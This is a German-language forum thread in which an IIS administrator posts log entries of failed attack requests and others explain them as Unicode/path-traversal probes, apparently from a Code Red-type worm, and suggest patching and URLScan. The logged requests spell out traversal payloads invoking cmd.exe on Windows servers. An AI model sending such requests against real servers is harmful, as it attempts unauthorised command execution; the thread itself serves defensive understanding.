Crockett 10 Posted July 26, 2004 Report Share Posted July 26, 2004 Hallo ! Hiermal ein Auszug aus dem Log von meiner IIS. ------ 2004-07-26 07:08:11 192.168.0.5 GET /scripts/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /MSADC/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /c/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /d/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 ---------- Am Ende steht immer der Code 404, heißt das das diese Versuche gescheitert sind oder sollte ich mir sorgen machen ? Gruß Christian Quote Link to comment
din 10 Posted July 26, 2004 Report Share Posted July 26, 2004 jepp das ist ein Attack versuch, da versucht jemand sogenannte Unicodes erfolgreich zu testen ums so einen zugriff auf das system zu erhalten. Könnte ein überbleibsel des Code Reds sein der simmer noch irgendwo im Netz umher irrt. Also einfach Windows aktuell halten dann sollte dies keine Bedrohung mehr darstellen. MFG dIN Quote Link to comment
Crockett 10 Posted July 27, 2004 Author Report Share Posted July 27, 2004 @din Danke für die Antwort... Sind die Versuche denn fehlgeschlagen weil hinten der Code 404 im Log steht ? Kann man evtl so etwas lokal testen ob der Server auf sowas reagiert ? Gruß Christian Quote Link to comment
Lian 2,414 Posted July 27, 2004 Report Share Posted July 27, 2004 Jep, beim Ergebnis 404 (File not Found) sind die Attacken erfolglos. Trotzdem mal über das IIS Lockdown Tool nachdenken - URLscan ist Dein Freund: http://www.microsoft.com/technet/security/tools/locktool.mspx Quote Link to comment
Crockett 10 Posted July 28, 2004 Author Report Share Posted July 28, 2004 @Lian Danke für den Link.. Hatte darüber mal was gelesen und auch schon mal runtergeladen. Ließ sich bei mir aber nicht installieren. Setze einen SBS 2003 ein wo der IIS 6.0 drauf läuft. Kann es sein das das Tool nur für die älteren Versionen vom Windows Servern und IIS ist ? Gruß Christian Quote Link to comment
Lian 2,414 Posted July 28, 2004 Report Share Posted July 28, 2004 Richtig, bei 2003 ist das Lockdown Tool schon eingebaut. Quote Link to comment
Crockett 10 Posted July 29, 2004 Author Report Share Posted July 29, 2004 @Lian Habe beim 2003 Server nichts gefunden ? Kann man das konfigurieren oder ist das einfach Build In ? Gruß Christian Quote Link to comment
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.